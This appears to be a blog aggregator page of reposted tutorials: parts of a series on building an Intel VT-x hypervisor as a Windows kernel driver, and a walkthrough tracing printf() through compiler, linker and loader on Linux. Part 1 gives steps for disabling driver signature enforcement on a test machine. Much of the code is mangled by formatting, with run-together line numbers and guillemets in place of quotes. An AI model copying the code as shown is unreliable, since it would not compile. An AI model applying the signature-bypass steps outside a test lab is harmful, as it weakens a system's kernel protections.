123456789101112131415161718192021222324252627int main(){ string CpuID; CpuID = GetCpuID(); cout << «[*] The CPU Vendor is : » << CpuID << endl; if (CpuID == «GenuineIntel») { cout << «[*] The Processor virtualization technology is VT-x. \n»; } else { cout << «[*] This program is not designed to run in a non-VT-x environemnt !\n»; return 1; } if (VMX_Support_Detection()) { cout << «[*] VMX Operation is supported by your processor .\n»; } else { cout << «[*] VMX Operation is not supported by your processor .\n»; return 1; } _getch();    return 0;}

The final result:

User-mode app

Enabling VMX Operation

If our processor supports the VMX Operation then its time to enable it. As I told you above, IRP_MJ_CREATE is the first function that should be used to start the operation.

Form Intel Software Developer’s Manual (23.7 ENABLING AND ENTERING VMX OPERATION):

Before system software can enter VMX operation, it enables VMX by setting CR4.VMXE[bit 13] = 1. VMX operation is then entered by executing the VMXON instruction. VMXON causes an invalid-opcode exception (#UD) if executed with CR4.VMXE = 0. Once in VMX operation, it is not possible to clear CR4.VMXE. System software leaves VMX operation by executing the VMXOFF instruction. CR4.VMXE can be cleared outside of VMX operation after executing of VMXOFF.
VMXON is also controlled by the IA32_FEATURE_CONTROL MSR (MSR address 3AH). This MSR is cleared to zero when a logical processor is reset. The relevant bits of the MSR are:

  •  Bit 0 is the lock bit. If this bit is clear, VMXON causes a general-protection exception. If the lock bit is set, WRMSR to this MSR causes a general-protection exception; the MSR cannot be modified until a power-up reset condition. System BIOS can use this bit to provide a setup option for BIOS to disable support for VMX. To enable VMX support in a platform, BIOS must set bit 1, bit 2, or both, as well as the lock bit.
  •  Bit 1 enables VMXON in SMX operation. If this bit is clear, execution of VMXON in SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support both VMX operation and SMX operation cause general-protection exceptions.
  •  Bit 2 enables VMXON outside SMX operation. If this bit is clear, execution of VMXON outside SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support VMX operation cause general-protection exceptions.

Setting CR4 VMXE Bit

Do you remember the previous part where I told you how to create an inline assembly in Windows Driver Kit x64

Now you should create some function to perform this operation in assembly.

Just in Header File (in my case Source.h) declare your function:

1extern void inline Enable_VMX_Operation(void);

Then in assembly file (in my case SourceAsm.asm) add this function (Which set the 13th (14th) bit of Cr4).

1234567891011Enable_VMX_Operation PROC PUBLICpush rax ; Save the state xor rax,rax ; Clear the RAXmov rax,cr4or rax,02000h         ; Set the 14th bitmov cr4,rax pop rax ; Restore the stateretEnable_VMX_Operation ENDP

Also, declare your function in the above of SourceAsm.asm.

1PUBLIC Enable_VMX_Operation

The above function should be called in DrvCreate:

123456NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ Enable_VMX_Operation(); // Enabling VMX Operation DbgPrint(«[*] VMX Operation Enabled Successfully !»); return STATUS_SUCCESS;}

At last, you should call the following function from the user-mode:

123456789 HANDLE hWnd = CreateFile(L»\\\\.\\MyHypervisorDevice», GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, /// lpSecurityAttirbutes OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, NULL); /// lpTemplateFile

If you see the following result, then you completed the second part successfully.

Final Show

Important Note: Please consider that your .asm file should have a different name from your driver main file (.c file) for example if your driver file is “Source.c” then using the name “Source.asm” causes weird linking errors in Visual Studio, you should change the name of you .asm file to something like “SourceAsm.asm” to avoid these kinds of linker errors.


In this part, you learned about basic stuff you to know in order to create a Windows Driver Kit program and then we entered to our virtual environment so we build a cornerstone for the rest of the parts.

In the third part, we’re getting deeper with Intel VT-x and make our driver even more advanced so wait, it’ll be ready soon!

The source code of this topic is available at :



[1] Intel® 64 and IA-32 architectures software developer’s manual combined volumes 3 (https://software.intel.com/en-us/articles/intel-sdm

[2] IRP_MJ_DEVICE_CONTROL (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/irp-mj-device-control)

[3]  Windows Driver Kit Samples (https://github.com/Microsoft/Windows-driver-samples/blob/master/general/ioctl/wdm/sys/sioctl.c)

[4] Setting Up Local Kernel Debugging of a Single Computer Manually (https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-local-kernel-debugging-of-a-single-computer-manually)

[5] Obtain processor manufacturer using CPUID (https://www.daniweb.com/programming/software-development/threads/112968/obtain-processor-manufacturer-using-cpuid)

[6] Plug and Play Minor IRPs (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/plug-and-play-minor-irps)

[7] _FAST_IO_DISPATCH structure (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/ns-wdm-_fast_io_dispatch)

[8] Filtering IRPs and Fast I/O (https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/filtering-irps-and-fast-i-o)

[9] Windows File System Filter Driver Development (https://www.apriorit.com/dev-blog/167-file-system-filter-driver)

Hypervisor From Scratch – Part 1: Basic Concepts & Configure Testing Environment

( Original text by Sinaei )

Hello everyone!

Welcome to the first part of a multi-part series of tutorials called “Hypervisor From Scratch”. As the name implies, this course contains technical details to create a basic Virtual Machine based on hardware virtualization. If you follow the course, you’ll be able to create your own virtual environment and you’ll get an understanding of how VMWare, VirtualBox, KVM and other virtualization softwares use processors’ facilities to create a virtual environment.


Both Intel and AMD support virtualization in their modern CPUs. Intel introduced (VT-x technology) that previously codenamed “Vanderpool” on November 13, 2005, in Pentium 4 series. The CPU flag for VT-xcapability is “vmx” which stands for Virtual Machine eXtension.

AMD, on the other hand, developed its first generation of virtualization extensions under the codename “Pacifica“, and initially published them as AMD Secure Virtual Machine (SVM), but later marketed them under the trademark AMD Virtualization, abbreviated AMD-V.

There two types of the hypervisor. The hypervisor type 1 called “bare metal hypervisor” or “native” because it runs directly on a bare metal physical server, a type 1 hypervisor has direct access to the hardware. With a type 1 hypervisor, there is no operating system to load as the hypervisor.

Contrary to a type 1 hypervisor, a type 2 hypervisor loads inside an operating system, just like any other application. Because the type 2 hypervisor has to go through the operating system and is managed by the OS, the type 2 hypervisor (and its virtual machines) will run less efficiently (slower) than a type 1 hypervisor.

Even more of the concepts about Virtualization is the same, but you need different considerations in VT-x and AMD-V. The rest of these tutorials mainly focus on VT-x because Intel CPUs are more popular and more widely used. In my opinion, AMD describes virtualization more clearly in its manuals but Intel somehow makes the readers confused especially in Virtualization documentation.

Hypervisor and Platform 

These concepts are platform independent, I mean you can easily run the same code routine in both Linux or Windows and expect the same behavior from CPU but I prefer to use Windows as its more easily debuggable (at least for me.) but I try to give some examples for Linux systems whenever needed. Personally, as Linux kernel manages faults like #GP and other exceptions and tries to avoid kernel panic and keep the system up so it’s better for testing something like hypervisor or any CPU-related affair. On the other hand, Windows never tries to manage any unexpected exception and it leads to a blue screen of death whenever you didn’t manage your exceptions, thus you might get lots of BSODs.By the way, you’d better test it on both platforms (and other platforms too.).

At last, I might (and definitely) make mistakes like wrong implementation or misinformation or forget about mentioning some important description so I should say sorry in advance if I make any faults and I’ll be glad for every comment that tells me my mistakes in the technical information or misinformation.

That’s enough, Let’s get started!

The Tools you’ll need

You should have a Visual Studio with WDK installed. you can get Windows Driver Kit (WDK) here.

The best way to debug Windows and any kernel mode affair is using Windbg which is available in Windows SDK here. (If you installed WDK with default installing options then you probably install WDK and SDK together so you can skip this step.)

You should be able to debug your OS (in this case Windows) using Windbg, more information here.

Hex-rays IDA Pro is an important part of this tutorial.

OSR Driver Loader which can be downloaded here, we use this tools in order to load our drivers into the Windows machine.

SysInternals DebugView for printing the DbgPrint() results.


Creating a Test Environment

Almost all of the codes in this tutorial have to run in kernel level and you must set up either a Linux Kernel Module or Windows Driver Kit (WDK) module. As configuring VMM involves lots of assembly code, you should know how to run inline assembly within you kernel project. In Linux, you shouldn’t do anything special but in the case of  Windows, WDK no longer supports inline assembly in an x64 environment so if you didn’t work on this problem previously then you might have struggle creating a simple x64 inline project but don’t worry in one of my post I explained it step by step so I highly recommend seeing this topic to solve the problem before continuing the rest of this part.

Now its time to create a driver!

There is a good article here if you want to start with Windows Driver Kit (WDK).

The whole driver is this :

123456789101112131415161718192021222324252627282930313233343536373839404142434445#include <ntddk.h>#include <wdf.h>#include <wdm.h> extern void inline AssemblyFunc1(void);extern void inline AssemblyFunc2(void); VOID DrvUnload(PDRIVER_OBJECT  DriverObject);NTSTATUS DriverEntry(PDRIVER_OBJECT  pDriverObject, PUNICODE_STRING  pRegistryPath); #pragma alloc_text(INIT, DriverEntry)#pragma alloc_text(PAGE, Example_Unload) NTSTATUS DriverEntry(PDRIVER_OBJECT  pDriverObject, PUNICODE_STRING  pRegistryPath){ NTSTATUS NtStatus = STATUS_SUCCESS; UINT64 uiIndex = 0; PDEVICE_OBJECT pDeviceObject = NULL; UNICODE_STRING usDriverName, usDosDeviceName;  DbgPrint(«DriverEntry Called.»);  RtlInitUnicodeString(&usDriverName, L»\Device\MyHypervisor»); RtlInitUnicodeString(&usDosDeviceName, L»\DosDevices\MyHypervisor»);  NtStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject);  if (NtStatus == STATUS_SUCCESS) { pDriverObject->DriverUnload = DrvUnload; pDeviceObject->Flags |= IO_TYPE_DEVICE; pDeviceObject->Flags &= (~DO_DEVICE_INITIALIZING); IoCreateSymbolicLink(&usDosDeviceName, &usDriverName); } return NtStatus;} VOID DrvUnload(PDRIVER_OBJECT  DriverObject){ UNICODE_STRING usDosDeviceName; DbgPrint(«DrvUnload Called rn»); RtlInitUnicodeString(&usDosDeviceName, L»\DosDevices\MyHypervisor»); IoDeleteSymbolicLink(&usDosDeviceName); IoDeleteDevice(DriverObject->DeviceObject);}

AssemblyFunc1 and AssemblyFunc2 are two external functions that defined as inline x64 assembly code.

Our driver needs to register a device so that we can communicate with our virtual environment from User-Mode code, on the hand, I defined DrvUnload which use PnP Windows driver feature and you can easily unload your driver and remove device then reload and create a new device.

The following code is responsible for creating a new device :

123456789101112 RtlInitUnicodeString(&usDriverName, L»\Device\MyHypervisor»); RtlInitUnicodeString(&usDosDeviceName, L»\DosDevices\MyHypervisor»);  NtStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject);  if (NtStatus == STATUS_SUCCESS) { pDriverObject->DriverUnload = DrvUnload; pDeviceObject->Flags |= IO_TYPE_DEVICE; pDeviceObject->Flags &= (~DO_DEVICE_INITIALIZING); IoCreateSymbolicLink(&usDosDeviceName, &usDriverName); }

If you use Windows, then you should disable Driver Signature Enforcement to load your driver, that’s because Microsoft prevents any not verified code to run in Windows Kernel (Ring 0).

To do this, press and hold the shift key and restart your computer. You should see a new Window, then

  1. Click Advanced options.
  2. On the new Window Click Startup Settings.
  3. Click on Restart.
  4. On the Startup Settings screen press 7 or F7 to disable driver signature enforcement.

The latest thing I remember is enabling Windows Debugging messages through registry, in this way you can get DbgPrint() results through SysInternals DebugView.

Just perform the following steps:

In regedit, add a key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter

Under that , add a DWORD value named IHVDRIVER with a value of 0xFFFF

Reboot the machine and you’ll good to go.

Some thoughts before the start

There are some keywords that will be frequently used in the rest of these series and you should know about them (Most of the definitions derived from Intel software developer’s manual, volume 3C).

Virtual Machine Monitor (VMM): VMM acts as a host and has full control of the processor(s) and other platform hardware. A VMM is able to retain selective control of processor resources, physical memory, interrupt management, and I/O.

Guest Software: Each virtual machine (VM) is a guest software environment.

VMX Root Operation and VMX Non-root Operation: A VMM will run in VMX root operation and guest software will run in VMX non-root operation.

VMX transitions: Transitions between VMX root operation and VMX non-root operation.

VM entries: Transitions into VMX non-root operation.

Extended Page Table (EPT): A modern mechanism which uses a second layer for converting the guest physical address to host physical address.

VM exits: Transitions from VMX non-root operation to VMX root operation.

Virtual machine control structure (VMCS): is a data structure in memory that exists exactly once per VM, while it is managed by the VMM. With every change of the execution context between different VMs, the VMCS is restored for the current VM, defining the state of the VM’s virtual processor and VMM control Guest software using VMCS.

The VMCS consists of six logical groups:

  •  Guest-state area: Processor state saved into the guest state area on VM exits and loaded on VM entries.
  •  Host-state area: Processor state loaded from the host state area on VM exits.
  •  VM-execution control fields: Fields controlling processor operation in VMX non-root operation.
  •  VM-exit control fields: Fields that control VM exits.
  •  VM-entry control fields: Fields that control VM entries.
  •  VM-exit information fields: Read-only fields to receive information on VM exits describing the cause and the nature of the VM exit.

I found a great work which illustrates the VMCS, The PDF version is also available here


Don’t worry about the fields, I’ll explain most of them clearly in the later parts, just remember VMCS Structure varies between different version of a processor.

VMX Instructions 

VMX introduces the following new instructions.

Intel/AMD MnemonicDescription
INVEPTInvalidate Translations Derived from EPT
INVVPIDInvalidate Translations Based on VPID
VMCALLCall to VM Monitor
VMCLEARClear Virtual-Machine Control Structure
VMFUNCInvoke VM function
VMLAUNCHLaunch Virtual Machine
VMRESUMEResume Virtual Machine
VMPTRLDLoad Pointer to Virtual-Machine Control Structure
VMPTRSTStore Pointer to Virtual-Machine Control Structure
VMREADRead Field from Virtual-Machine Control Structure
VMWRITEWrite Field to Virtual-Machine Control Structure
VMXOFFLeave VMX Operation
VMXONEnter VMX Operation

Life Cycle of VMM Software

  • The following items summarize the life cycle of a VMM and its guest software as well as the interactions between them:
    • Software enters VMX operation by executing a VMXON instruction.
    • Using VM entries, a VMM can then turn guests into VMs (one at a time). The VMM effects a VM entry using instructions VMLAUNCH and VMRESUME; it regains control using VM exits.
    • VM exits transfer control to an entry point specified by the VMM. The VMM can take action appropriate to the cause of the VM exit and can then return to the VM using a VM entry.
    • Eventually, the VMM may decide to shut itself down and leave VMX operation. It does so by executing the VMXOFF instruction.

That’s enough for now!

In this part, I explained about general keywords that you should be aware and we create a simple lab for our future tests. In the next part, I will explain how to enable VMX on your machine using the facilities we create above, then we survey among the rest of the virtualization so make sure to check the blog for the next part.


[1] Intel® 64 and IA-32 architectures software developer’s manual combined volumes 3 (https://software.intel.com/en-us/articles/intel-sdm

[2] Hardware-assisted Virtualization (http://www.cs.cmu.edu/~412/lectures/L04_VTx.pdf)

[3] Writing Windows Kernel Driver (https://resources.infosecinstitute.com/writing-a-windows-kernel-driver/)

[4] What Is a Type 1 Hypervisor? (http://www.virtualizationsoftware.com/type-1-hypervisors/)

[5] Intel / AMD CPU Internals (https://github.com/LordNoteworthy/cpu-internals)

[6] Windows 10: Disable Signed Driver Enforcement (https://ph.answers.acer.com/app/answers/detail/a_id/38288/~/windows-10%3A-disable-signed-driver-enforcement)

[7] Instruction Set Mapping » VMX Instructions (https://docs.oracle.com/cd/E36784_01/html/E36859/gntbx.html)

Tearing apart printf()

( Original text )

If ‘Hello World’ is the first program for C students, then printf() is probably the first function. I’ve had to answer questions about printf() many times over the years, so I’ve finally set aside time for an informal writeup. The common questions fit roughly in to two forms:

  • Easy: How does printf mechanically solve the format problem?
  • Complex: How does printf actually display text on my console?

My usual answer?
«Just open up stdio.h and track it down»

This wild goose chase is not only a great learning experience, but also an interesting test for the dedicated beginner. Will they come back with an answer? If so, how detailed is it? What IS a good answer?

printf() in 30 seconds — TL;DR edition

printf’s execution is tailored to your system and generally goes like this:

  1. Your application uses printf()
  2. Your compiler/linker produce a binary. printf is a load-time pointer to your C library
  3. Your C runtime fixes up the format and sends the string to the kernel via a generic write
  4. Your OS mediates the string’s access to its console representation via a device driver
  5. Text appears in your screen

…but you probably already knew all that.

This is the common case for user-space applications running on an off-the-shelf system. (Side-stepping virtual/embedded/distributed/real-mode machines for the moment).

A more complicated answer starts with: It depends — printf mechanics vary across long list of things: Your compiler toolchain, system architecture to include the operating system, and obviously how you’ve used it in your program. The diagram above is generally correct but precisely useless for any specific situation.

If you’re not impressed, that’s good. Let’s refine it.

printf() in 90 seconds — Interview question edition

  1. You include the <stdio.h> header in your application
  2. You use printf non-trivially in your app.
  3. Your compiler produces object code — printf is recognized, but unresolved
  4. The linker constructs the executable, printf is tagged for run-time resolution
  5. You execute your program. Standard library is mapped in the process address space
  6. A call to printf() jumps to library code
  7. The formatted string is resolved in a temporary buffer
  8. Standard library writes to the stdout buffered stream. Eventual kernel write entry
  9. Kernel calls a driver write operation for the associated console
  10. Console output buffer is updated with the new string
  11. Output text appears on your console

Sounds better? There’s still a lot missing, including any mention of system specifics. More things to think about (in no particular order):

  • Are we using static or dynamic linkage? Normally printf is run-time linked, but there are exceptions.
  • What OS is this? The differences between them are drastic — When/how is stdout managed? What is the console and how is it updated? What is the kernel entry/syscall procedure…
  • Closely related to the OS…what kind of executable is this? If ELF, we need to talk about the GOT / PLT. If PE (Windows), then we need an import directory.
  • What kind of terminal are you using? Standard laptop/desktop? University cluster over ssh? Is this a virtual machine?
  • This list could go on forever, and all answers affect what really happens behind the scenes.

Things to know before continuing

The next part is targeted for C beginners who want to explore how functions execute through a complex system. I’m keeping the discussion at a high-level so we can focus on how many parts of the problem contribute to a whole solution. I’ll provide references to source code and technical documents so readers can explore on their own. No blog substitutes for authoritative documentation.

Now for a more important question:
Why do beginners get stuck searching for a detailed answer about basic functions like printf()?

I’ll boil it down to three problems:

Not understanding the distinct roles of the compiler, standard library, operating system, and hardware. You can’t look at just one aspect of a system and expect to understand how a function like printf() works. Each component handles a part of the ‘printf’ problem and passes the work to the next using common interfaces along the way. C compilers try to adhere to the ISO C standards. Operating systems may also follow standards such as POSIX/SUS. Standardization streamlines interoperability and portability, but with the cost of code complexity. Beginners often struggle following the chain of code, especially when the standard requirements end and the ‘actual work’ begins between the interfaces. The common complaint: Too many seemingly useless function calls between the interface and the work. This is the price of interoperability and there’s no easy + maintainable + scalable way around it!

Not grasping [compile/link/load/run]-time dynamics. Manual static analysis has limits, and so following any function through the standard library source code inevitably leads to a dead end — an unresolved jump table, an opaque macro with multiple expansions, or a hard stop at the end: an ambiguous function pointer. In printf’s case, that would be *write, which the operating system promises will be exist at run-time. Modern compilers and OSs are designed to be multi-platform and thus every possible code path that could exist is visible prior to compilation. Beginners may get lost in a code base where much of the source ‘compiles away’ and functions resolve dynamically at execution. Trivial case: If you call printf() on a basic string without formats, your compiler may emit a call to ‘puts’, discarding your printf entirely!

Not enough exposure to common abstractions used in complex software systems. Tracing any function through the compiler and OS means working through many disparate ideas in computing. For instance, many I/O operations involve the idea of a character stream. Buffering character I/O with streams has been part of Unix System V since the early 1980s, thanks in part to Dennis Ritchie, co-author of ‘The C Programming Language’. Since the 1990s, multiprocessing has become the norm. Tracing printf means stepping around locks, mutexes, semaphores, and other synchronization tools. More recently, i18n has upped the ante for simple console output. All these concepts taken together often distract and overwhelm beginners who are simply trying to understand one core problem.

Bottom line: Compilers, libraries, operating systems, and hardware are complex; we need to understand how each works together as a system in order to truly understand how printf() works.

printf() in 1000 seconds — TMI edition

(or ‘Too-specific-to-apply-to-any-system-except-mine-on-the-day-I-wrote-this edition’)

The best way to answer these questions is to work through the details on an actual system.

$uname -a
Linux localhost.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

$gcc --version
gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-16)
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO

$ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
Written by Roland McGrath and Ulrich Drepper.

Key points:

Step 0 — What is printf?

printf() is an idea that the folks at Bell Labs believed in as early as 1972: A programmer should be able to produce output using various formats without understanding exactly what’s going on under the hood.

This idea is merely an interface.

The programmer calls printf and the system will handle the rest. That is why you’re presumably reading this article — hiding implementation details works!

Early compilers supported programmers exclusively through built-in functions. When toolchains became a business in the early 1980s (Manx/Aztec C, Lattice C), many provided C and ASM source code for common functions that developers could #include in their projects as needed. This allowed customization of built-ins at the application level — no more rebuilding your toolchain for each project. However, programmers were still at the mercy of various brands of compilers, each bringing their own vision of how to implement these functions and run-time.

Thankfully, most of this hassel has gone away today. So if you want to use printf…

Step 1 — Include the <stdio.h> header

Goal: Tap into the infinite power of the C standard library

The simple line of code #include <stdio.h> is possible across the vast majority of computer systems thanks to standards. Specifically, ISO-9899.

In 1978, Brian Kernighan and Dennis Ritchie described printf in its full variadic form to include nine types of formats:

printf(control, arg1, arg2, ...);    # K&R (1st ed.)

This was as close as the industry would get to a standard for the next decade. Between 1983 and 1989, the ANSI committee worked on the formal standard that eventually brought the printf interface to its familiar form:

int printf(const char *format, ...);   # ANSI C (1989)

Here’s an oft-forgotten bit of C trivia: printf returns a value (the actual character output count). The interface from 1978 didn’t mention a return value, but the implied return type is integer under K&R rules. The earliest known compiler (linked above) did not return any value.

The most recent C standard from 2011 shows that the interface changed by only one keyword in the intervening 20 years:

int printf(const char * restrict format, ...);  # Latest ISO C (2011)

‘restrict’ (a C99 feature) allows the compiler to optimize without concern for pointer aliasing.

Over the past 40 years, the interface for printf is mostly unchanged, thus highly backwards compatible. However, the feature set has grown quite a bit:

1972 1978 1989 2011
%d — decimal Top 3 from ’72 All from ’78 plus… Too many!
%o — octal %x — hexadecimal %i — signed int Read
%s — string %u — unsigned decimal %p — void pointer the
%p — string ptr %c — byte/character %n — output count manual
%e,f,g — floats/dbl %% — complete form pp. 309-315

Step 2 — Use printf() with formats

Goal: Make sure your call to printf actually uses printf()

We’ll test out printf() with two small plagarized programs. However, only one of them is truly a candidate to trace printf().

Trivial printf() — printf0.c Better printf() — printf1.c
$ cat printf0.c
#include <stdio.h>

int main(int argc, char **argv)
  printf("Hello World\n");
  return 0;
$ cat printf1.c
#include <stdio.h>

int main(int argc, char **argv)
  printf("Hello World %d\n",1);
  return 0;

The difference is that printf0.c does not actually contain any formats, thus there is no reason to use printf. Your compiler won’t bother to use it. In fact, you can’t even disable this ‘optimization’ using GCC -O0 because the substitution (fold) happens during semantic analysis (GCC lingo: Gimplification), not during optimization. To see this in action, we must compile!

Possible trap: Some compilers may recognize the ‘1’ literal used in printf1.c, fold it in to the string, and avoid printf() in both cases. If that happens to you, substitute an expression that must be evaluated.

Step 3 — Compiler produces object code

Goal: Organize the components (symbols) of your application

Compiling programs results in an object file, which contains records of every symbol in the source file. Each .c file compiles to a .o file but none of seen any other files (no linking yet). Let’s look at the symbols in both of the programs from the last step.

Trivial printf() More useful printf()
$ gcc printf0.c -c -o printf0.o
$ nm printf0.o
0000000000000000 T main
                 U puts
$ gcc printf1.c -c -o printf1.o
$ nm printf1.o
0000000000000000 T main
                 U printf

As expected, the trivial printf usage has a symbol to a more simple function, puts. The file that included a format instead as a symbol for printf. In both cases, the symbol is undefined. The compiler doesn’t know where puts() or printf() are defined, but it knows that they exist thanks to stdio.h. It’s up to the linker to resolve the symbols.

Step 4 — Linking brings it all together

Goal: Build a binary that includes all code in one package

Let’s compile and linking both files again, this time both statically and dynamically.

$ gcc printf0.c -o printf0            # Trivial printf dynamic linking
$ gcc printf1.c -o printf1            # Better printf dynamic linking
$ gcc printf0.c -o printf0_s -static  # Trivial printf static linking
$ gcc printf1.c -o printf1_s -static  # Better printf static linking

Possible trap: You need to have the static standard library available to statically link (libc.a). Most systems already have the shared library built-in (libc.so). Windows users will need a libc.lib and maybe a libmsvcrt.lib. I haven’t tested in an MS environment in a while.

Static linking pulls all the standard library object code in to the executable. The benefit for us is that all of the code executed in user space is now self-contained in this single file and we can easily trace to see the standard library functions. In real life, you rarely want to do this. This disadvantages are just too great, especially for maintainability. Here’s an obvious disadvantage:

$ ls -l printf1*
total 1696
-rwxrwxr-x. 1 maiz maiz   8520 Mar 31 13:38 printf1     # Dynamic
-rw-rw-r--. 1 maiz maiz    101 Mar 31 12:57 printf1.c
-rw-rw-r--. 1 maiz maiz   1520 Mar 31 13:37 printf1.o
-rwxrwxr-x. 1 maiz maiz 844000 Mar 31 13:40 printf1_s   # Static

Our test binary blew up from 8kb to 844kb. Let’s take a look at the symbol count in each:

$ nm printf1.o | wc -l
2                      # Object file symbol count (main, printf)
$ nm printf1 | wc -l
34                     # Dynamic-linked binary symbol count
$ nm printf1_s | wc -l
1873                   # Static-linked binary symbol count

Our original, unlinked object file had just the two symbols we already saw (main and printf). The dynamic-linked binary has 34 symbols, most of which correspond to the C runtime, which sets up the environment. Finally, our static-linked binary has nearly 2000 symbols, which include everything that could be used from the standard library.

As you may know, this has a significant impact on load-time and run-time

Step 5 — Loader prepares the run-time

Goal: Set up the execution environment

The dynamic-linked binary has more work to do than its static brother. The static version included 1873 symbols, but the dynamic binary only inluded 34 with the binary. It needs to find the code in shared libraries and memory map it in to the process address space. We can watch this in action by using strace.

Dynamic-linked printf() syscall trace

$ strace ./printf1
execve("./printf1", ["./printf1"], [/* 47 vars */]) = 0
brk(NULL) = 0x1dde000
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce82000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=83694, ...}) = 0
mmap(NULL, 83694, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f59bce6d000
close(3) = 0
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2127336, ...}) = 0
mmap(NULL, 3940800, ..., 3, 0) = 0x7f59bc89f000
mprotect(0x7f59bca57000, 2097152, PROT_NONE) = 0
mmap(0x7f59bcc57000, 24576, ..., 3, 0x1b8000) = 0x7f59bcc57000
mmap(0x7f59bcc5d000, 16832, ..., -1, 0) = 0x7f59bcc5d000
close(3) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce6c000
mmap(NULL, 8192, ..., -1, 0) = 0x7f59bce6a000
arch_prctl(ARCH_SET_FS, 0x7f59bce6a740) = 0
mprotect(0x7f59bcc57000, 16384, PROT_READ) = 0
mprotect(0x600000, 4096, PROT_READ) = 0
mprotect(0x7f59bce83000, 4096, PROT_READ) = 0
munmap(0x7f59bce6d000, 83694) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce81000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

Each line is a syscall. The first is just after bash clones in to printf1_s, and the write syscall is near the bottom. The 21 syscalls between brk and the final fstatare devoted to loading shared libraries. This is the load-time penalty for dynamic-linking. Don’t worry if this seems like a mess, we won’t be using it. If you’re interested in more detail, here is the full dump with walkthrough

Now let’s look at the memory map for the process

Dynamic-linked printf() memory map

$ cat /proc/3177/maps
00400000-00401000 r-xp 00000000         ./printf1
00600000-00601000 r--p 00000000         ./printf1
00601000-00602000 rw-p 00001000         ./printf1
7f59bc89f000-7f59bca57000 r-xp 00000000 /usr/lib64/libc-2.17.so
7f59bca57000-7f59bcc57000 ---p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc57000-7f59bcc5b000 r--p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc5b000-7f59bcc5d000 rw-p 001bc000 /usr/lib64/libc-2.17.so
7f59bcc5d000-7f59bcc62000 rw-p 00000000  
7f59bcc62000-7f59bcc83000 r-xp 00000000 /usr/lib64/ld-2.17.so
7f59bce6a000-7f59bce6d000 rw-p 00000000  
7f59bce81000-7f59bce83000 rw-p 00000000  
7f59bce83000-7f59bce84000 r--p 00021000 /usr/lib64/ld-2.17.so
7f59bce84000-7f59bce85000 rw-p 00022000 /usr/lib64/ld-2.17.so
7f59bce85000-7f59bce86000 rw-p 00000000  
7fff89031000-7fff89052000 rw-p 00000000 [stack]
7fff8914e000-7fff89150000 r-xp 00000000 [vdso]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

Our 8kb binary fits in to three 4kb memory pages (top three lines). The standard library has been mapped in to the ~middle of the address space. Code execution begins in the code area at the top, and jumps in to the shared library as needed.

This is the last I’ll mention the dynamic-linked version. We’ll use the static version from now on since it’s easier to trace.

Static-linked printf() syscall trace

$ strace ./printf1_s
execve("./printf1_s", ["./printf1_s"],[/*47 vars*/]) = 0
uname({sysname="Linux", nodename="...", ...}) = 0
brk(NULL) = 0x1d4a000
brk(0x1d4b1c0) = 0x1d4b1c0
arch_prctl(ARCH_SET_FS, 0x1d4a880) = 0
brk(0x1d6c1c0) = 0x1d6c1c0
brk(0x1d6d000) = 0x1d6d000
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7faad3151000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

The static-linked binary uses far fewer syscalls. I’ve highlighted three of them near the bottom: fstatmmap, and write. These occur during printf(). We’ll trace this better in the next step. First, let’s look at the static memory map:

Static-linked printf() memory map

$ cat /proc/3237/printf1_s
00400000-004b8000 r-xp 00000000         ./printf1_s
006b7000-006ba000 rw-p 000b7000         ./printf1_s
006ba000-006df000 rw-p 00000000         [heap]
7ffff7ffc000-7ffff7ffd000 rw-p 00000000 
7ffff7ffd000-7ffff7fff000 r-xp 00000000 [vdso]
7ffffffde000-7ffffffff000 rw-p 00000000 [stack]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

No hint of a shared library. That’s because all the code is now included on the first two lines within the printf1_s binary. The static binary is using 187 pages of memory, just short of 800kb. This follows what we know about the large binary size.

Now we’ll move on to the more interesting part: execution.

Step 6 — printf call jumps to the standard library

Goal: Follow the standard library call sequence at run-time

The programmer shapes code for the printf interface then the run-time library bridges the standard API and the OS interface.

